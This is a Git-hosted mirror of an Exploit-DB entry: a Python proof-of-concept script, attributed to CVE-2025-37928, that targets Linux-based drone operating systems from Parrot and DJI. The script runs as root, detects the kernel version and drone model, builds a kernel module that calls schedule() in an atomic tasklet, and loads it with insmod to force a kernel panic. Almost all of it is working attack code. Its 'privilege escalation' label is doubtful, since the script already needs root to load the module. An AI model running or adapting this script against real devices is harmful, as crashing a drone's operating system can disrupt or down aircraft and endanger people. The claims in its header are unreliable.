bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/local/52329.py
Exploit-DB 3cfac1e6a4 DB: 2025-06-16 
15 changes to exploits/shellcodes/ghdb

AirKeyboard iOS App 1.0.5 - Remote Input Injection

Parrot and DJI variants Drone OSes - Kernel Panic Exploit

Skyvern 0.1.85 - Remote Code Execution (RCE) via SSTI

Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)

Litespeed Cache WordPress Plugin 6.3.0.1 - Privilege Escalation

PHP CGI Module 8.3.4 - Remote Code Execution (RCE)

Microsoft Excel Use After Free - Local Code Execution

PCMan FTP Server 2.0.7 - Buffer Overflow

PCMan FTP Server 2.0.7 - Remote Buffer Overflow

WebDAV Windows 10 - Remote Code Execution (RCE)

Windows 11 SMB Client - Privilege Escalation & Remote Code Execution (RCE)
2025-06-16 00:18:32 +00:00

223 lines
No EOL
7 KiB
Python
Executable file
Raw Blame History

#!/usr/bin/env python3
# Exploit Title: Parrot and DJI variants Drone OSes - Kernel Panic Exploit
# Author: Mohammed Idrees Banyamer
# Instagram: @banyamer_security
# GitHub: https://github.com/mbanyamer
# Date: 2025-06-10
# Tested on: Parrot QRD, Parrot Alpha-M, DJI QRD, DJI Alpha-M
# CVE: CVE-2025-37928
# Type: Local Privilege Escalation / Kernel Panic
# Platform: Linux-based drone OS (Parrot and DJI variants)
# Author Country: Jordan
# CVSS v3.1 Score: 7.3 (Important)
# Weakness: CWE-284: Improper Access Control
# Attack Vector: Local
# User Interaction: None
# Scope: Unchanged
# Confidentiality, Integrity, Availability Impact: High (Denial of Service via Kernel Panic)
# Exploit Code Maturity: Proof of Concept
# Remediation Level: Official Fix Available
#
# Description:
# This PoC triggers a kernel panic by calling schedule() inside an atomic context,
# exploiting CVE-2025-37928 present in certain Linux kernels running on
# Parrot QRD, Parrot Alpha-M, DJI QRD, and DJI Alpha-M drone operating systems.
#
# Steps of exploitation:
# 1. Check if running as root.
# 2. Verify kernel version vulnerability.
# 3. Detect drone type from system files.
# 4. Build and load vulnerable kernel module.
# 5. Trigger kernel panic by scheduling a tasklet calling schedule() in atomic context.
#
# Affected Drone Versions:
# - Parrot QRD
# - Parrot Alpha-M (DT)
# - DJI QRD
# - DJI Alpha-M (DT)
#
# ------------------------------------------------------------------------------
# Usage:
# sudo python3 cve_2025_37928_tool.py [OPTIONS]
#
# Options:
# --dry-run Run detection & build only (no module loading)
# --force Force exploit even if kernel not detected as vulnerable
# --cleanup-only Remove the kernel module without triggering panic
# --verbose Enable detailed logging and debug output
# --help Show usage information
#
# Examples:
# sudo python3 cve_2025_37928_tool.py --dry-run
# sudo python3 cve_2025_37928_tool.py
# sudo python3 cve_2025_37928_tool.py --force
# sudo python3 cve_2025_37928_tool.py --cleanup-only
#
# Warning:
# This PoC causes an immediate kernel panic.
# Use it ONLY in isolated and controlled environments (e.g., lab tests).
# ------------------------------------------------------------------------------
import os
import sys
import subprocess
import tempfile
import argparse
import shutil
import platform
MODULE_NAME = "cve_2025_37928_poc"
C_FILENAME = MODULE_NAME + ".c"
KO_FILENAME = MODULE_NAME + ".ko"
KERNEL_MODULE_CODE = r'''
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/interrupt.h>
#include <linux/sched.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("PoC Author");
MODULE_DESCRIPTION("PoC for CVE-2025-37928: schedule() in atomic context causes kernel panic");
static void trigger_panic_tasklet(unsigned long data)
{
pr_alert("[CVE-2025-37928] Executing schedule() inside atomic context. This will panic!\n");
schedule(); // This causes kernel panic
}
DECLARE_TASKLET(my_tasklet, trigger_panic_tasklet, 0);
static int __init poc_init(void)
{
pr_info("[CVE-2025-37928] Loading PoC module and scheduling tasklet...\n");
tasklet_schedule(&my_tasklet);
return 0;
}
static void __exit poc_exit(void)
{
tasklet_kill(&my_tasklet);
pr_info("[CVE-2025-37928] PoC module unloaded\n");
}
module_init(poc_init);
module_exit(poc_exit);
'''
MAKEFILE_CONTENT = f'''
obj-m += {MODULE_NAME}.o
all:
\tmake -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
\tmake -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
'''
def check_root():
if os.geteuid() != 0:
print("[-] Must be run as root.")
sys.exit(1)
def detect_kernel():
version = platform.release()
vulnerable_versions = ["5.10", "5.15", "6.0"]
vulnerable = any(v in version for v in vulnerable_versions)
print(f"[i] Kernel version: {version} => {'VULNERABLE' if vulnerable else 'UNKNOWN/SAFE'}")
return vulnerable
def detect_drone_type():
print("[*] Detecting drone type...")
files = ["/etc/drone_type", "/proc/device-tree/model", "/sys/firmware/devicetree/base/model"]
found = []
for path in files:
if os.path.exists(path):
try:
with open(path, "r") as f:
content = f.read().strip()
if any(x in content for x in ["Parrot", "DJI"]):
found.append(content)
except:
continue
if found:
for d in found:
print(f" [i] Found: {d}")
else:
print(" [!] No drone ID found.")
return found
def write_module(tempdir):
c_path = os.path.join(tempdir, C_FILENAME)
makefile_path = os.path.join(tempdir, "Makefile")
with open(c_path, "w") as f:
f.write(KERNEL_MODULE_CODE)
with open(makefile_path, "w") as f:
f.write(MAKEFILE_CONTENT)
return c_path
def build_module(tempdir):
print("[*] Building module...")
result = subprocess.run(["make"], cwd=tempdir, capture_output=True, text=True)
if result.returncode != 0:
print("[-] Build failed:\n", result.stderr)
sys.exit(1)
print("[+] Build successful.")
return os.path.join(tempdir, KO_FILENAME)
def load_module(ko_path):
print("[*] Loading kernel module...")
result = subprocess.run(["insmod", ko_path], capture_output=True, text=True)
if result.returncode != 0:
print("[-] insmod failed:\n", result.stderr)
sys.exit(1)
print("[!] Module loaded. Kernel panic should occur if vulnerable.")
def unload_module():
print("[*] Attempting to remove module...")
subprocess.run(["rmmod", MODULE_NAME], stderr=subprocess.DEVNULL)
print("[+] Module removal attempted.")
def clean_build(tempdir):
subprocess.run(["make", "clean"], cwd=tempdir, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def main():
parser = argparse.ArgumentParser(description="CVE-2025-37928 Kernel Panic Exploit Tool for Drone OSes")
parser.add_argument("--dry-run", action="store_true", help="Only simulate and check environment, no exploitation")
parser.add_argument("--force", action="store_true", help="Force execution even if version unknown")
parser.add_argument("--cleanup-only", action="store_true", help="Just remove kernel module if loaded")
args = parser.parse_args()
check_root()
if args.cleanup_only:
unload_module()
return
vulnerable = detect_kernel()
detect_drone_type()
if not vulnerable and not args.force:
print("[-] Kernel not identified as vulnerable. Use --force to override.")
sys.exit(1)
if args.dry_run:
print("[*] Dry run mode. Exiting before exploitation.")
return
with tempfile.TemporaryDirectory() as tempdir:
print(f"[*] Working directory: {tempdir}")
write_module(tempdir)
ko_path = build_module(tempdir)
try:
load_module(ko_path)
except KeyboardInterrupt:
print("[!] Interrupted. Attempting cleanup...")
finally:
unload_module()
clean_build(tempdir)
if __name__ == "__main__":
main()
Reference in a new issue View git blame Copy permalink